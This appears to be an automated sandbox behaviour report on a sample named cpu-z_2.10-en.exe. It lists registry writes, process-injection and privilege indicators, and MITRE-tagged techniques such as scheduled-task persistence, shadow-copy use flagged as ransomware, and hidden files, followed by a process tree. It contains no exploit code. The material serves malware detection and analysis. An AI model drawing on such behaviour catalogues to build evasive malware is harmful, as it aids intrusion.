Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "602"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = aa21025949e5da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ea36ad6449e5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "591"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "429415577"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz!	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9f5c795549e5da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "591"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
6432	reg.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
6308	chrome.exe
6308	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
2744	chrome.exe
2744	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2860	MicrosoftEdgeCP.exe

Suspicious behavior: MapViewOfSection 13 IoCs

pid	Process
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

pid	Process
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1668	firefox.exe
Token: SeDebugPrivilege	1668	firefox.exe
Token: SeDebugPrivilege	4384	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4384	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4384	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4384	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5892	firefox.exe
Token: SeDebugPrivilege	5892	firefox.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: 33	4152	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4152	AUDIODG.EXE
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6308	chrome.exe
Token: SeCreatePagefilePrivilege	6308	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe
Token: SeShutdownPrivilege	6668	chrome.exe
Token: SeCreatePagefilePrivilege	6668	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1668	firefox.exe
1668	firefox.exe
1668	firefox.exe
1668	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
5892	firefox.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1668	firefox.exe
1668	firefox.exe
1668	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6308	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
6668	chrome.exe
5892	firefox.exe
5892	firefox.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe
2188	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1668	firefox.exe
1120	MicrosoftEdge.exe
5056	MicrosoftEdgeCP.exe
4384	MicrosoftEdgeCP.exe
2860	MicrosoftEdgeCP.exe
2860	MicrosoftEdgeCP.exe
5056	MicrosoftEdgeCP.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5540	@[email protected]
5540	@[email protected]
3952	@[email protected]
3952	@[email protected]
3396	@[email protected]
3396	@[email protected]
3724	@[email protected]
6660	@[email protected]
3652	@[email protected]
6392	@[email protected]
6444	@[email protected]
7060	@[email protected]
8172	@[email protected]
7180	@[email protected]
7244	@[email protected]
7064	@[email protected]
7644	@[email protected]
2316	@[email protected]
1100	@[email protected]
7892	@[email protected]
6584	@[email protected]
6744	@[email protected]
6660	@[email protected]
7444	@[email protected]
7520	@[email protected]
7668	@[email protected]
1792	@[email protected]
7024	@[email protected]
7924	@[email protected]
2088	@[email protected]
5700	@[email protected]
8028	@[email protected]
6612	@[email protected]
5660	@[email protected]
7184	@[email protected]
7248	@[email protected]
1496	@[email protected]
2412	@[email protected]
1412	@[email protected]
7708	@[email protected]
6404	@[email protected]
7836	@[email protected]
1064	@[email protected]
3284	@[email protected]
7984	@[email protected]
7760	@[email protected]
8160	@[email protected]
1116	@[email protected]
2056	@[email protected]
312	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 1204	3428	cpu-z_2.10-en.exe	73
PID 3428 wrote to memory of 1204	3428	cpu-z_2.10-en.exe	73
PID 3428 wrote to memory of 1204	3428	cpu-z_2.10-en.exe	73
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 3864 wrote to memory of 1668	3864	firefox.exe	76
PID 1668 wrote to memory of 4216	1668	firefox.exe	77
PID 1668 wrote to memory of 4216	1668	firefox.exe	77
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78
PID 1668 wrote to memory of 5016	1668	firefox.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6976	attrib.exe
3828	attrib.exe
6116	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cpu-z_2.10-en.exe
"C:\Users\Admin\AppData\Local\Temp\cpu-z_2.10-en.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Users\Admin\AppData\Local\Temp\is-QMJD1.tmp\cpu-z_2.10-en.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-QMJD1.tmp\cpu-z_2.10-en.tmp" /SL5="$60200,2688759,776192,C:\Users\Admin\AppData\Local\Temp\cpu-z_2.10-en.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1204

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3864
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.0.1005658614\1420878370" -parentBuildID 20221007134813 -prefsHandle 1696 -prefMapHandle 1684 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33b9a610-5ee8-4837-ac1b-abb2cf7e3021} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 1776 1909fdf3e58 gpu
    3⤵
    PID:4216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.1.1781462674\1163691671" -parentBuildID 20221007134813 -prefsHandle 2120 -prefMapHandle 2116 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b795bff4-0dcd-46c0-b0f8-e238bbe6fec7} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 2132 1908da70d58 socket
    3⤵
    - Checks processor information in registry
    PID:5016
